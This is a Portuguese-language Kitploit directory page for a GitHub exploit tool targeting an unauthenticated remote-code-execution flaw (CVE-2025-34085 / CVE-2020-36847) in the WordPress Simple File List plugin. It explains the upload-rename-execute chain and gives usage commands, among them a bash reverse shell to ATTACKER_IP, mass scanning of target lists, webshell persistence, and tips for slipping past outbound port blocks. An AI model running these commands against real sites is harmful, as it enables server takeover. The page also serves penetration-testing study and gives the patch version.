Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/0xgunrunner/cve-2025-34085
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHub0xgunrunner/cve-2025-34085

CVE-2025-34085

Exploit para CVE-2025-34085

Ver Repositório
13há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-34085 — Simple File List do WordPress RCE não autenticado

Um exploit automatizado para CVE-2025-34085 (duplicata de CVE-2020-36847), uma vulnerabilidade crítica de execução remota de código não autenticada no plugin WordPress Simple File List versões ≤ 4.2.2.

Nota: CVE-2025-34085 foi rejeitado pelo MITRE como duplicata do CVE-2020-36847. A vulnerabilidade é real e corrigida na versão 4.2.3. Ambos os IDs CVE referem-se ao mesmo problema subjacente.

Resumo da Vulnerabilidade

Baixar ferramenta
CampoDetalhe
CVECVE-2025-34085 / CVE-2020-36847
PluginSimple File List
Versões Afetadas≤ 4.2.2
Versão Corrigida4.2.3
TipoUpload irrestrito de arquivos → Bypass de renomeação → RCE
CVSS9.8 (Crítico)
AutenticaçãoNenhuma necessária
Descoberta Originalcoiffeur
Módulo Metasploitexploit/multi/http/wp_simple_file_list_rce

Como Funciona

  1. Upload — Um payload PHP é carregado disfarçado como um arquivo .png através do endpoint de upload do plugin (ee-upload-engine.php). O mecanismo de upload valida extensões, mas aceita arquivos de imagem.

  2. Renomeação — A funcionalidade de renomeação do plugin (ee-file-engine.php) não impõe restrições de extensão. O atacante renomeia o .png para .php (ou .phtml, .php5, .php3).

  3. Execução — O arquivo PHP renomeado agora está acessível e executável no diretório de uploads em /wp-content/uploads/simple-file-list/, dando ao atacante execução arbitrária de comandos.

Requisitos

root@kitploit:~
pip install requests colorama

Python 3.6+

Uso

Alvo Único

root@kitploit:~
python3 CVE-2025-34085.py -u http://target.com --cmd "id"

Alvo Único com Comando Inline (sem parâmetro ?cmd=)

root@kitploit:~
python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline

Varredura em Massa

Crie um arquivo targets.txt com uma URL por linha:

root@kitploit:~
http://target1.com
http://target2.com
https://target3.com
root@kitploit:~
python3 CVE-2025-34085.py --cmd "id"

Argumentos

ArgumentoDescriçãoPadrão
-u, --urlURL do alvo único—
--cmdComando a executar no alvoid
--inlineInjetar comando diretamente no shell PHP (hardcoded, sem webshell ?cmd=)False

Dica: Use --inline quando precisar de um reverse shell ou quando o alvo tiver filtragem de query string. Sem --inline, o exploit cria um webshell que aceita comandos via ?cmd=.

Saída

Exploits bem-sucedidos são registrados em vuln.txt:

root@kitploit:~
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)

Notas de OPSEC para OSCP

  • O exploit carrega um arquivo PHP para o disco — isso vai deixar artefatos
  • O webshell persiste em /wp-content/uploads/simple-file-list/<random>.php
  • Uploads bem-sucedidos são registrados localmente em vuln.txt — útil para seu relatório
  • Para o exame, use --inline com um reverse shell para evitar deixar um webshell persistente com ?cmd=
  • Se o alvo bloquear portas de saída, tente portas comuns permitidas (80, 443, 53)

Referências

  • NVD — CVE-2025-34085
  • NVD — CVE-2020-36847
  • Wordfence Advisory
  • Metasploit Module
  • Plugin Changelog (Patch)
  • Exploit-DB #48979
  • Original PoC by coiffeur — Exploit-DB #48349

Remediação

Atualize o plugin Simple File List para a versão 4.2.3 ou superior.

Aviso Legal

Esta ferramenta é destinada apenas para testes de penetração autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha autorização adequada antes de testar.

Créditos

  • Descoberta original da vulnerabilidade: coiffeur
  • Script de exploit original: 0xgh057r3c0n, B1ack4sh (Ashwesker)
  • Mantido por: 0xgunrunner